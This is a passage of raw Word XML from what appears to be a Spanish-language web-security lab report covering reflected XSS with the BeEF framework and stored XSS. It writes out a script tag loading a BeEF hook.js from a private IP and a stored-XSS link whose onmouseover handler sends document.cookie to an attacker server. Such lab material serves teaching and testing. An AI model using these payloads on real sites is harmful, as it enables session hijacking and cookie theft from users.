    <w:p w14:paraId="10635680" w14:textId="77777777" w:rsidR="00D72515" w:rsidRDefault="00D72515" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BF9B98C" w14:textId="77777777" w:rsidR="00B605D6" w:rsidRDefault="00B605D6" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A67ADB" w14:textId="2C23500F" w:rsidR="00B605D6" w:rsidRDefault="00D72515" w:rsidP="00D72515">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72515">
        <w:t xml:space="preserve">Beef es una herramienta bastante útil y completa para automatizar ataques XSS contra clientes de aplicaciones web vulnerables, consiste en el uso de vectores de ataque XSS clásicos de forma automatizada, donde Beef, controla a todas las víctimas de este tipo de ataques y permite ejecutar diferentes tipos de payloads contra el objetivo, </w:t>
      </w:r>
      <w:r w:rsidR="00D911EB" w:rsidRPr="00D72515">
        <w:t>además</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72515">
        <w:t xml:space="preserve"> de capturar información sobre la víctima, tales como sistema operativo utilizado, navegador, dirección IP, cookies, entre otra información valiosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237D8F68" w14:textId="22F3513D" w:rsidR="00D72515" w:rsidRDefault="00D72515" w:rsidP="00D72515">
      <w:pPr>
        <w:ind w:left="708"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B805D6F" w14:textId="6B4157B5" w:rsidR="00D72515" w:rsidRDefault="00D72515">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Primero ejecuto </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72515">
        <w:t>sudo beef-xss</w:t>
      </w:r>
      <w:r>
        <w:t>, con esto se crea un servidor web en la IP en que lo ejecute, en el puerto 3000 tcp</w:t>
      </w:r>
      <w:r w:rsidR="00290819">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE99B0" w14:textId="77777777" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D46E1DE" w14:textId="56C274AB" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00290819">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42907C7F" wp14:editId="39DF6964">
            <wp:extent cx="5400040" cy="3936365"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="315" name="Imagen 3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n 315" descr="Texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId201"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="3936365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D02B0B0" w14:textId="77777777" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E300ECD" w14:textId="43D56DCD" w:rsidR="00290819" w:rsidRDefault="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Simplemente tendremos que inyectar en lugar vulnerable a XSS, el paiload generado: </w:t>
      </w:r>
      <w:r w:rsidR="00312E63" w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>&lt;script src="http://192.168.1.148:3000/hook.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E649744" w14:textId="0D5D0DF4" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00290819">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B43C3D2" wp14:editId="02735A0A">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="316" name="Imagen 316"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n 316" descr="Calendario&#10;&#10;Descripción generada automáticamente con confianza media"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ECF9F8" w14:textId="77777777" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E01D0D" w14:textId="2F3E7F01" w:rsidR="00290819" w:rsidRDefault="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora en el navegador web vamos a esta IP: </w:t>
      </w:r>
      <w:hyperlink r:id="rId203" w:history="1">
        <w:r w:rsidRPr="00E0472E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://127.0.0.1:3000/ui/panel</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9B1006" w14:textId="77777777" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A64E0D5" w14:textId="2EEB7514" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00290819">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BF902DA" wp14:editId="06EF8C71">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="318" name="Imagen 3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n 318" descr="Interfaz de usuario gráfica, Texto, Aplicación, Correo electrónico&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId204"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F74707" w14:textId="3B61F72C" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Veremos el navegador comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38541958" w14:textId="77777777" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E71D3BD" w14:textId="23936F03" w:rsidR="00290819" w:rsidRDefault="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Podremos ejecutar multitud de pailoads en él, en este caso ejecutaré una para obtener las cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A701AAE" w14:textId="76E1DAC7" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00290819">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5192FDE7" wp14:editId="538C5B1D">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="320" name="Imagen 3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n 320" descr="Interfaz de usuario gráfica, Aplicación&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId205"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A4C8E" w14:textId="6A168AA6" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD1E3DC" w14:textId="3CB8486D" w:rsidR="00290819" w:rsidRDefault="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ahora ejecutaré GET Page HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF5664" w14:textId="77777777" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF1124B" w14:textId="7EA17203" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r w:rsidRPr="00290819">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39F0D9AB" wp14:editId="480EE62F">
            <wp:extent cx="5400040" cy="2902585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="321" name="Imagen 32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n 321" descr="Interfaz de usuario gráfica, Aplicación, Word&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId206"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2902585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="129FCE3C" w14:textId="44EAD42C" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDA70A6" w14:textId="24469FE5" w:rsidR="00290819" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
      <w:r>
        <w:t>Como vemos tendría control sobre lo que hace el usuario en el navegador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E113ED4" w14:textId="74C4CB4D" w:rsidR="00290819" w:rsidRPr="00D72515" w:rsidRDefault="00290819" w:rsidP="00290819">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1065"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE84B8E" w14:textId="77777777" w:rsidR="00084B9B" w:rsidRDefault="00084B9B" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231728F6" w14:textId="4A8B23C8" w:rsidR="003E7A7A" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E89542" w14:textId="77777777" w:rsidR="003E7A7A" w:rsidRPr="009845FC" w:rsidRDefault="003E7A7A" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B12B4F7" w14:textId="77777777" w:rsidR="009845FC" w:rsidRPr="009845FC" w:rsidRDefault="009845FC" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012E733F" w14:textId="772FABEB" w:rsidR="008C136D" w:rsidRDefault="008C136D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Este sería el esquema de un posible ataque de este tipo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE351ED" w14:textId="7DCADF2A" w:rsidR="008C136D" w:rsidRDefault="008C136D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE04804" w14:textId="6B496103" w:rsidR="008C136D" w:rsidRDefault="008C136D" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD1BAE1" wp14:editId="7D4FBEFB">
            <wp:extent cx="5400040" cy="3334385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="195" name="Imagen 195" descr="Ataque XSS Refle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aque XSS Reflejado"/>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0040" cy="3334385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B9850" w14:textId="32AF2861" w:rsidR="00E21D4F" w:rsidRDefault="00E21D4F" w:rsidP="008B68A9">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5F967A" w14:textId="441CB25E" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00C91766"/>
    <w:p w14:paraId="1BF39725" w14:textId="7C980D85" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc128034162"/>
      <w:r>
        <w:t>Xtored XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="704BB527" w14:textId="23719387" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57356D58" w14:textId="3CBF91C2" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este ataque </w:t>
      </w:r>
      <w:r w:rsidR="00AB0F22">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> documentado por OWASP Fundation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidRPr="00D56B2F">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>enlace</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B9923F" w14:textId="45279336" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este ataque tiene como </w:t>
      </w:r>
      <w:r w:rsidR="00C66975">
        <w:t>característica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que la aplicación guarda el payload malicioso en un medio de almacenamiento hasta que el valor es recuperado y es utilizado por parte del documento HTML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3D791" w14:textId="354E169B" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estos ataques se deben a una insuficiente, o nula, validación de los campos introducidos en formularios dando lugar a que al enviar los datos estos sean almacenados en un fichero, base de datos, </w:t>
      </w:r>
      <w:r w:rsidR="00C66975">
        <w:t>etc., provocando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que sean ejecutados en cada navegador que carga la aplicación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F925F6A" w14:textId="5D635F31" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4847B40A" w14:textId="36069A24" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Vamos a probar el ataque en la aplicación web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365422C2" w14:textId="18869163" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para esto </w:t>
      </w:r>
      <w:r w:rsidR="00C66975">
        <w:t>vamos a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> intentar guardar un script malicioso en el formulario de la aplicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509DBCD8" w14:textId="4E627C5D" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3349EA15" w14:textId="6C91AACB" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00D56B2F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5347B196" wp14:editId="276078A8">
            <wp:extent cx="5400040" cy="5805170"/>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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B520DBB" w14:textId="05E58CA3" w:rsidR="00FE2B3D" w:rsidRDefault="00FE2B3D" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52510A8D" w14:textId="0AF15327" w:rsidR="00FE2B3D" w:rsidRDefault="00FE2B3D" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este sería el código del paiload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE2B3D">
        <w:t>&lt;a onmouseover="</w:t>
      </w:r>
      <w:r w:rsidRPr="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>fetch('http://192.168.1.148:433?key='+document.cookie)" href="#"&gt;Mira esto!!!!!!&lt;/a&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00312E63">
        <w:rPr>
          <w:color w:val="44546A" w:themeColor="text2"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644EAAA6" w14:textId="19D987CD" w:rsidR="00787F8B" w:rsidRDefault="00FE2B3D" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Con esto lo que haríamos es que cada vez que alguien pasara sobre el enlace se enviarían sus cookies, al servidor del atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41235583" w14:textId="382BAC13" w:rsidR="00787F8B" w:rsidRDefault="00787F8B" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55164DC7" w14:textId="6FE509CD" w:rsidR="00D56B2F" w:rsidRDefault="00787F8B" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00787F8B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A912994" wp14:editId="7EE9B291">
            <wp:extent cx="5400040" cy="5805170"/>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5805170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B5E433" w14:textId="1D005391" w:rsidR="00FE2B3D" w:rsidRDefault="00FE2B3D" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3092AFC1" w14:textId="5CF9FB28" w:rsidR="00FE2B3D" w:rsidRDefault="00FE2B3D" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2B3D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D250DE3" wp14:editId="63D6273F">
            <wp:extent cx="5400040" cy="284035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2840355"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8AE3D4" w14:textId="6C313C39" w:rsidR="00787F8B" w:rsidRDefault="00787F8B" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37E0466D" w14:textId="31FA96D8" w:rsidR="00787F8B" w:rsidRDefault="00787F8B" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7579AEBD" w14:textId="77777777" w:rsidR="00787F8B" w:rsidRPr="00D56B2F" w:rsidRDefault="00787F8B" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3F1F89" w14:textId="3C8D536E" w:rsidR="008B68A9" w:rsidRDefault="008B68A9" w:rsidP="008B68A9"/>
    <w:p w14:paraId="0BD8A54A" w14:textId="23078166" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:t>Este sería el esquema de un posible ataque de este tipo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FBD961" w14:textId="39711EC7" w:rsidR="00D56B2F" w:rsidRDefault="00D56B2F" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C16ECDF" wp14:editId="5BAB2616">
            <wp:extent cx="5400040" cy="2889250"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="194" name="Imagen 194" descr="Ataque XSS Almac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aque XSS Almacenad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0040" cy="2889250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B69D99" w14:textId="4FC8C03C" w:rsidR="00BD0955" w:rsidRDefault="00BD0955" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD9A20D" w14:textId="54775483" w:rsidR="00BD0955" w:rsidRDefault="00BD0955" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B964822" w14:textId="00F20D4B" w:rsidR="00BD0955" w:rsidRDefault="00BD0955" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A91BDBC" w14:textId="60F4B8B5" w:rsidR="00D12A1A" w:rsidRDefault="00D12A1A" w:rsidP="00D12A1A">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097A0313" w14:textId="77777777" w:rsidR="00183B9E" w:rsidRDefault="00183B9E" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1099F878" w14:textId="77777777" w:rsidR="00183B9E" w:rsidRDefault="00183B9E" w:rsidP="00D56B2F">
      <w:pPr>
        <w:ind w:left="1068"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C66AF8" w14:textId="0E12406B" w:rsidR="008C136D" w:rsidRDefault="00DF2697">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc128034163"/>
      <w:r>
        <w:t>Manipulación del estado del cliente</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
